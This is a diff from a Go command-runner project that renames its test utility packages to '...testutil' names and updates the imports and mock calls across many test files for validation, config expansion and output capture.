@@ -1068,7 +1068,7 @@ func TestValidator_ValidateCompletePath_SymlinkProtection(t *testing.T) {
 		},
 		{
 			name: "AddSymlink should fail when path already exists",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Create directory first
 				fs.AddDir("/usr", 0o755)
 				fs.AddDir("/usr/existing", 0o755)
@@ -1086,7 +1086,7 @@ func TestValidator_ValidateCompletePath_SymlinkProtection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Create fresh mock filesystem for each test
-			testMockFS := commontesting.NewMockFileSystem()
+			testMockFS := commontestutil.NewMockFileSystem()
 			testValidator, err := NewValidator(config, WithFileSystem(testMockFS))
 			require.NoError(t, err)
 
@@ -1115,7 +1115,7 @@ func TestValidator_ValidatePathComponents_EdgeCases(t *testing.T) {
 
 	tests := []struct {
 		name       string
-		setupFunc  func(*commontesting.MockFileSystem)
+		setupFunc  func(*commontestutil.MockFileSystem)
 		path       string
 		shouldFail bool
 	}{
@@ -1127,7 +1127,7 @@ func TestValidator_ValidatePathComponents_EdgeCases(t *testing.T) {
 		},
 		{
 			name: "single level directory",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDir("/test", 0o755)
 			},
 			path:       "/test",
@@ -1135,7 +1135,7 @@ func TestValidator_ValidatePathComponents_EdgeCases(t *testing.T) {
 		},
 		{
 			name: "path with double slashes",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDir("/usr", 0o755)
 				fs.AddDir("/usr/local", 0o755)
 			},
@@ -1144,7 +1144,7 @@ func TestValidator_ValidatePathComponents_EdgeCases(t *testing.T) {
 		},
 		{
 			name: "empty path components handled",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDir("/usr", 0o755)
 				fs.AddDir("/usr/local", 0o755)
 			},
@@ -1156,7 +1156,7 @@ func TestValidator_ValidatePathComponents_EdgeCases(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Create fresh mock filesystem for each test
-			testMockFS := commontesting.NewMockFileSystem()
+			testMockFS := commontestutil.NewMockFileSystem()
 			testValidator, err := NewValidator(config, WithFileSystem(testMockFS))
 			require.NoError(t, err)
 
@@ -1178,7 +1178,7 @@ func TestValidator_ValidatePathComponents_EdgeCases(t *testing.T) {
 }
 
 func TestValidator_ValidateFilePermissions(t *testing.T) {
-	mockFS := commontesting.NewMockFileSystem()
+	mockFS := commontestutil.NewMockFileSystem()
 	validator, err := NewValidator(DefaultConfig(), WithFileSystem(mockFS))
 	require.NoError(t, err)
 
@@ -1255,7 +1255,7 @@ func TestValidator_ValidateFilePermissions(t *testing.T) {
 
 	t.Run("path too long", func(t *testing.T) {
 		// Test with a path that's too long
-		mockFS2 := commontesting.NewMockFileSystem()
+		mockFS2 := commontestutil.NewMockFileSystem()
 		config2 := DefaultConfig()
 		// Override for path length testing
 		config2.AllowedCommands = []string{".*"}
@@ -1272,7 +1272,7 @@ func TestValidator_ValidateFilePermissions(t *testing.T) {
 }
 
 func TestValidator_ValidateDirectoryPermissions(t *testing.T) {
-	mockFS := commontesting.NewMockFileSystem()
+	mockFS := commontestutil.NewMockFileSystem()
 	validator, err := NewValidator(DefaultConfig(), WithFileSystem(mockFS))
 	require.NoError(t, err)
 
@@ -1364,7 +1364,7 @@ func TestValidator_ValidateDirectoryPermissions(t *testing.T) {
 
 	t.Run("path too long", func(t *testing.T) {
 		// Test with a path that's too long
-		mockFS2 := commontesting.NewMockFileSystem()
+		mockFS2 := commontestutil.NewMockFileSystem()
 		config2 := DefaultConfig()
 		// Override for path length testing
 		config2.AllowedCommands = []string{".*"}
@@ -1389,13 +1389,13 @@ func TestValidator_validateCompletePath(t *testing.T) {
 
 	tests := []struct {
 		name      string
-		setupFunc func(mockFS *commontesting.MockFileSystem)
+		setupFunc func(mockFS *commontestutil.MockFileSystem)
 		path      string
 		wantErr   bool
 	}{
 		{
 			name: "complete_path_validation_with_uid_context",
-			setupFunc: func(mockFS *commontesting.MockFileSystem) {
+			setupFunc: func(mockFS *commontestutil.MockFileSystem) {
 				// Create a complete directory hierarchy owned by current user
 				err := mockFS.AddDirWithOwner("/home", 0o755, UIDRoot, GIDRoot)
 				require.NoError(t, err)
@@ -1411,7 +1411,7 @@ func TestValidator_validateCompletePath(t *testing.T) {
 		},
 		{
 			name: "complete_path_validation_with_ownership_mismatch",
-			setupFunc: func(mockFS *commontesting.MockFileSystem) {
+			setupFunc: func(mockFS *commontestutil.MockFileSystem) {
 				// Create hierarchy with ownership mismatch
 				err := mockFS.AddDirWithOwner("/tmp", 0o755, UIDRoot, GIDRoot)
 				require.NoError(t, err)
@@ -1426,7 +1426,7 @@ func TestValidator_validateCompletePath(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockFS := commontesting.NewMockFileSystem()
+			mockFS := commontestutil.NewMockFileSystem()
 			tt.setupFunc(mockFS)
 
 			groupMembership := groupmembership.New()

--- a/internal/runner/base/security/testutil/testify_mocks.go
+++ b/internal/runner/base/security/testutil/testify_mocks.go
@@ -1,7 +1,7 @@
 //go:build test
 
-// Package securitytesting provides mock implementations for security validation testing.
-package securitytesting
+// Package securitytestutil provides mock implementations for security validation testing.
+package securitytestutil
 
 import (
 	"github.com/stretchr/testify/mock"

--- a/internal/runner/base/security/testutil/testify_mocks_test.go
+++ b/internal/runner/base/security/testutil/testify_mocks_test.go
@@ -1,17 +1,17 @@
-package securitytesting_test
+package securitytestutil_test
 
 import (
 	"errors"
 	"testing"
 
-	securitytesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
 )
 
 func TestMockValidator_ValidateAllEnvironmentVars(t *testing.T) {
 	// Arrange
-	mockValidator := new(securitytesting.MockValidator)
+	mockValidator := new(securitytestutil.MockValidator)
 	envVars := map[string]string{"TEST": "value"}
 	expectedErr := errors.New("validation error")
 
@@ -27,7 +27,7 @@ func TestMockValidator_ValidateAllEnvironmentVars(t *testing.T) {
 
 func TestMockValidator_ValidateEnvironmentValue(t *testing.T) {
 	// Arrange
-	mockValidator := new(securitytesting.MockValidator)
+	mockValidator := new(securitytestutil.MockValidator)
 	expectedErr := errors.New("validation error")
 
 	mockValidator.On("ValidateEnvironmentValue", "KEY", "value").Return(expectedErr)
@@ -42,7 +42,7 @@ func TestMockValidator_ValidateEnvironmentValue(t *testing.T) {
 
 func TestMockValidator_SuccessScenario(t *testing.T) {
 	// Arrange
-	mockValidator := new(securitytesting.MockValidator)
+	mockValidator := new(securitytestutil.MockValidator)
 
 	mockValidator.On("ValidateAllEnvironmentVars", mock.Anything).Return(nil)
 	mockValidator.On("ValidateEnvironmentValue", mock.Anything, mock.Anything).Return(nil)

--- a/internal/runner/base/security/trusted_gids_linux_test.go
+++ b/internal/runner/base/security/trusted_gids_linux_test.go
@@ -5,7 +5,7 @@ package security
 import (
 	"testing"
 
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	isec "github.com/isseis/go-safe-cmd-runner/internal/security"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -27,7 +27,7 @@ func TestValidator_validateGroupWritePermissions_LinuxTrustedGIDConfigDifference
 	newValidatorWithDir := func(t *testing.T, config *Config, gid uint32) *Validator {
 		t.Helper()
 
-		mockFS := commontesting.NewMockFileSystem()
+		mockFS := commontestutil.NewMockFileSystem()
 		err := mockFS.AddDirWithOwner("/test", 0o775, UIDRoot, gid)
 		require.NoError(t, err)
 

--- a/internal/runner/base/security/validator_test.go
+++ b/internal/runner/base/security/validator_test.go
@@ -4,7 +4,7 @@ import (
 	"os"
 	"testing"
 
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/groupmembership"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -100,7 +100,7 @@ func TestNewValidator_WithOptions(t *testing.T) {
 	})
 
 	t.Run("with WithFileSystem option", func(t *testing.T) {
-		mockFS := commontesting.NewMockFileSystem()
+		mockFS := commontestutil.NewMockFileSystem()
 		config := DefaultConfig()
 		validator, err := NewValidator(config, WithFileSystem(mockFS))
 
@@ -122,7 +122,7 @@ func TestNewValidator_WithOptions(t *testing.T) {
 	})
 
 	t.Run("with both options", func(t *testing.T) {
-		mockFS := commontesting.NewMockFileSystem()
+		mockFS := commontestutil.NewMockFileSystem()
 		gm := groupmembership.New()
 		config := DefaultConfig()
 		validator, err := NewValidator(config, WithFileSystem(mockFS), WithGroupMembership(gm))
@@ -134,7 +134,7 @@ func TestNewValidator_WithOptions(t *testing.T) {
 	})
 
 	t.Run("option application order independence", func(t *testing.T) {
-		mockFS := commontesting.NewMockFileSystem()
+		mockFS := commontestutil.NewMockFileSystem()
 		gm := groupmembership.New()
 		config := DefaultConfig()
 

--- a/internal/runner/bootstrap/config_test.go
+++ b/internal/runner/bootstrap/config_test.go
@@ -6,7 +6,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/filevalidator"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/config"
@@ -201,7 +201,7 @@ func TestBootstrapCommandEnvExpansionIntegration(t *testing.T) {
 	require.Equal(t, "run_app", cmdSpec.Name)
 
 	// Expand command spec to runtime
-	runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+	runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 	require.NoError(t, err)
 	require.NotNil(t, runtimeCmd)
 

--- a/internal/runner/command_output_capture_test.go
+++ b/internal/runner/command_output_capture_test.go
@@ -15,12 +15,12 @@ import (
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/output"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
-	securitytesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
-	resourcetestutil "github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/verification"
-	verificationtesting "github.com/isseis/go-safe-cmd-runner/internal/verification/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/verification/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
 	"github.com/stretchr/testify/require"
@@ -77,8 +77,8 @@ func TestIntegration_CommandOutputCapture(t *testing.T) {
 	// Create real executor and resource manager
 	exec := executor.NewDefaultExecutor()
 	fs := common.NewDefaultFileSystem()
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Create mock path resolver
 	mockPathResolver := &mockPathResolver{}
@@ -111,7 +111,7 @@ func TestIntegration_CommandOutputCapture(t *testing.T) {
 	})
 
 	// Mock verification manager
-	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
+	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
 	mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 	mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 	mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)
@@ -253,8 +253,8 @@ func TestIntegration_SensitiveDataRedaction(t *testing.T) {
 			// Create real executor and resource manager
 			exec := executor.NewDefaultExecutor()
 			fs := common.NewDefaultFileSystem()
-			mockValidator := new(securitytesting.MockValidator)
-			mockVerificationManager := new(verificationtesting.MockManager)
+			mockValidator := new(securitytestutil.MockValidator)
+			mockVerificationManager := new(verificationtestutil.MockManager)
 
 			// Create mock path resolver
 			mockPathResolver := &mockPathResolver{}
@@ -286,7 +286,7 @@ func TestIntegration_SensitiveDataRedaction(t *testing.T) {
 			})
 
 			// Mock verification manager
-			mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
+			mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
 			mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 			mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 			mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)

--- a/internal/runner/config/allowlist_validation_test.go
+++ b/internal/runner/config/allowlist_validation_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/config"
 	"github.com/stretchr/testify/assert"
@@ -206,7 +206,7 @@ func TestAllowlist_ViolationAtCommandLevel(t *testing.T) {
 			require.NoError(t, err)
 
 			// Finally expand command
-			_, err = config.ExpandCommand(tt.cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+			_, err = config.ExpandCommand(tt.cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 			if tt.wantErr {
 				require.Error(t, err, tt.description)
 				require.ErrorIs(t, err, config.ErrVariableNotInAllowlist, "error should be ErrVariableNotInAllowlist")
@@ -324,7 +324,7 @@ func TestAllowlist_InheritanceAcrossLevels(t *testing.T) {
 
 		groupRuntime, err := config.ExpandGroup(groupSpec, globalRuntime)
 		require.NoError(t, err)
-		_, err = config.ExpandCommand(cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+		_, err = config.ExpandCommand(cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 		require.NoError(t, err, "Command should inherit global allowlist")
 	})
 }

--- a/internal/runner/config/circular_reference_test.go
+++ b/internal/runner/config/circular_reference_test.go
@@ -6,7 +6,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/config"
 	"github.com/stretchr/testify/assert"
@@ -357,7 +357,7 @@ func TestCircularReference_CrossLevel_GroupCommand(t *testing.T) {
 			require.NoError(t, err, "Group expansion should succeed")
 
 			// Then try to expand command (this is where error should be detected)
-			_, err = config.ExpandCommand(tt.command, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+			_, err = config.ExpandCommand(tt.command, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 			require.Error(t, err, "Expected error in command expansion")
 			assert.True(t, errors.Is(err, tt.wantErr), "Expected error type %v, got %v", tt.wantErr, err)
 
@@ -603,7 +603,7 @@ func TestCircularReference_CommandVarsToGroupVars(t *testing.T) {
 			}
 
 			// Finally expand command
-			runtimeCmd, err := config.ExpandCommand(tt.command, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+			runtimeCmd, err := config.ExpandCommand(tt.command, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 			if tt.wantErr != nil {
 				require.Error(t, err, "Expected error in command expansion")
 				assert.True(t, errors.Is(err, tt.wantErr), "Expected error type %v, got %v", tt.wantErr, err)

--- a/internal/runner/config/config_test.go
+++ b/internal/runner/config/config_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/pelletier/go-toml/v2"
@@ -351,7 +351,7 @@ args = ["mydb", "-f", "%{__runner_workdir}/dump.sql"]
 
 			// 4. Expand command
 			cmdSpec := &group.Commands[0]
-			runtimeCmd, err := ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+			runtimeCmd, err := ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 			require.NoError(t, err, "Failed to expand command")
 
 			// 5. Verify command name

--- a/internal/runner/config/end_to_end_expansion_test.go
+++ b/internal/runner/config/end_to_end_expansion_test.go
@@ -6,7 +6,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/config"
 	"github.com/stretchr/testify/assert"
@@ -65,7 +65,7 @@ func TestEndToEndExpansion_GlobalVariablesInTemplates(t *testing.T) {
 		runtimeGroup,
 		globalRuntime,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 
@@ -125,7 +125,7 @@ func TestEndToEndExpansion_LocalVariablesInParams(t *testing.T) {
 		runtimeGroup,
 		globalRuntime,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 

--- a/internal/runner/config/expansion_bench_test.go
+++ b/internal/runner/config/expansion_bench_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 )
 
@@ -87,7 +87,7 @@ func BenchmarkExpandCommand(b *testing.B) {
 
 	b.ResetTimer()
 	for range b.N {
-		_, _ = ExpandCommand(spec, nil, rGroup, rGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+		_, _ = ExpandCommand(spec, nil, rGroup, rGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 	}
 }
 
@@ -167,7 +167,7 @@ func BenchmarkExpandCommandWithEnvImport(b *testing.B) {
 
 	b.ResetTimer()
 	for range b.N {
-		_, _ = ExpandCommand(cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+		_, _ = ExpandCommand(cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 	}
 }
 
@@ -222,7 +222,7 @@ func BenchmarkExpandMultipleCommandsWithEnvImport(b *testing.B) {
 	for range b.N {
 		// Expand all commands (simulating loop in group_executor)
 		for _, cmdSpec := range cmdSpecs {
-			_, _ = ExpandCommand(cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+			_, _ = ExpandCommand(cmdSpec, nil, groupRuntime, globalRuntime, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 		}
 	}
 }

--- a/internal/runner/config/expansion_integration_test.go
+++ b/internal/runner/config/expansion_integration_test.go
@@ -6,7 +6,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -339,7 +339,7 @@ func TestExpandCommandWithTemplate(t *testing.T) {
 				runtimeGroup,
 				runtimeGlobal,
 				common.NewUnsetTimeout(),
-				commontesting.NewUnsetOutputSizeLimit(),
+				commontestutil.NewUnsetOutputSizeLimit(),
 			)
 
 			if tt.expectErr {

--- a/internal/runner/config/template_backward_compat_test.go
+++ b/internal/runner/config/template_backward_compat_test.go
@@ -8,7 +8,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -196,7 +196,7 @@ env_vars = ["GO111MODULE=on", "GOOS=linux"]
 			require.NoError(t, err)
 
 			// Expand the command (with empty template map for backward compatibility)
-			expanded, err := ExpandCommand(targetCmd, cfg.CommandTemplates, runtimeGroup, globalRuntime, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+			expanded, err := ExpandCommand(targetCmd, cfg.CommandTemplates, runtimeGroup, globalRuntime, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 			require.NoError(t, err)
 
 			// Verify expansion results

--- a/internal/runner/config/template_execution_settings_test.go
+++ b/internal/runner/config/template_execution_settings_test.go
@@ -6,7 +6,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/stretchr/testify/assert"
@@ -175,7 +175,7 @@ msg = "hello"
 				runtimeGroup,
 				runtimeGlobal,
 				common.NewUnsetTimeout(),
-				commontesting.NewUnsetOutputSizeLimit(),
+				commontestutil.NewUnsetOutputSizeLimit(),
 			)
 			require.NoError(t, err)
 

--- a/internal/runner/config/template_integration_test.go
+++ b/internal/runner/config/template_integration_test.go
@@ -7,7 +7,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -55,7 +55,7 @@ func TestTemplateIntegrationWithSampleFile(t *testing.T) {
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 	assert.Equal(t, "restic", runtimeCmd.Cmd())
@@ -74,7 +74,7 @@ func TestTemplateIntegrationWithSampleFile(t *testing.T) {
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 	assert.Equal(t, "restic", runtimeCmd.Cmd())
@@ -90,7 +90,7 @@ func TestTemplateIntegrationWithSampleFile(t *testing.T) {
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 	assert.Equal(t, "restic", runtimeCmd.Cmd())
@@ -107,7 +107,7 @@ func TestTemplateIntegrationWithSampleFile(t *testing.T) {
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 	assert.Equal(t, "restic", runtimeCmd.Cmd())
@@ -158,7 +158,7 @@ message = "%{greeting} %{name}"
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 
@@ -205,7 +205,7 @@ path = "/home"
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 	assert.Equal(t, "ls", runtimeCmd.Cmd())
@@ -324,7 +324,7 @@ message = 123
 					runtimeGroup,
 					runtimeGlobal,
 					common.NewUnsetTimeout(),
-					commontesting.NewUnsetOutputSizeLimit(),
+					commontestutil.NewUnsetOutputSizeLimit(),
 				)
 				require.Error(t, err)
 				if tt.wantErrType != nil {
@@ -375,7 +375,7 @@ msg = "hello"
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 
@@ -483,7 +483,7 @@ mycmd = "echo"
 				runtimeGroup,
 				runtimeGlobal,
 				common.NewUnsetTimeout(),
-				commontesting.NewUnsetOutputSizeLimit(),
+				commontestutil.NewUnsetOutputSizeLimit(),
 			)
 
 			if tt.wantErr {
@@ -548,7 +548,7 @@ message = "%{msg}"
 		runtimeGroup1,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 	assert.Equal(t, []string{"Group 1"}, runtimeCmd1.ExpandedArgs)
@@ -562,7 +562,7 @@ message = "%{msg}"
 		runtimeGroup2,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 	assert.Equal(t, []string{"Group 2"}, runtimeCmd2.ExpandedArgs)
@@ -732,7 +732,7 @@ msg = "hello"
 				runtimeGroup,
 				runtimeGlobal,
 				common.NewUnsetTimeout(),
-				commontesting.NewUnsetOutputSizeLimit(),
+				commontestutil.NewUnsetOutputSizeLimit(),
 			)
 			require.NoError(t, err)
 
@@ -921,7 +921,7 @@ env_vars = []
 				runtimeGroup,
 				runtimeGlobal,
 				common.NewUnsetTimeout(),
-				commontesting.NewUnsetOutputSizeLimit(),
+				commontestutil.NewUnsetOutputSizeLimit(),
 			)
 			require.NoError(t, err)
 

--- a/internal/runner/config/template_risk_debug_test.go
+++ b/internal/runner/config/template_risk_debug_test.go
@@ -6,7 +6,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 )
@@ -49,7 +49,7 @@ dst = "s3://my-bucket/test.txt"
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 
@@ -116,7 +116,7 @@ dst = "s3://my-bucket/test.txt"
 		runtimeGroup,
 		runtimeGlobal,
 		common.NewUnsetTimeout(),
-		commontesting.NewUnsetOutputSizeLimit(),
+		commontestutil.NewUnsetOutputSizeLimit(),
 	)
 	require.NoError(t, err)
 

--- a/internal/runner/e2e_slack_redaction_test.go
+++ b/internal/runner/e2e_slack_redaction_test.go
